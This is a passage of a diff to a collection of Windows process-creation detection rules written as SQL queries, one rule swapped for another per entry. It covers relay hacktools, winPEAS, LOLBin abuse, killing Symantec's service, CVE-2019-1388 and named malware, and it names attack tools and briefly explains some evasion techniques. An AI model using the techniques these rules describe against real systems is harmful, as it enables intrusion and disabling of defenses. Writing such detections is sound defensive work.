"experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - 
"attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a software developer." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + 
"attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "status": "experimental", + "description": "Application Virtualization Utility is included with Microsoft Office. 
We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ - "Legitimate processes that run at logon. 
Filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE 
'\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "title": "HackTool - winPEAS Execution", + "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. 
As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% 
-linpeas' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE 
'%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "Suspicious Process Start Locations", - "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", - "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "status": "experimental", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 
'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. 
An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects Archer 
malware invocation via rundll32", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrator" + "Legitimate use by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu 
@semanurtg, oscd.community", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new 
service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", 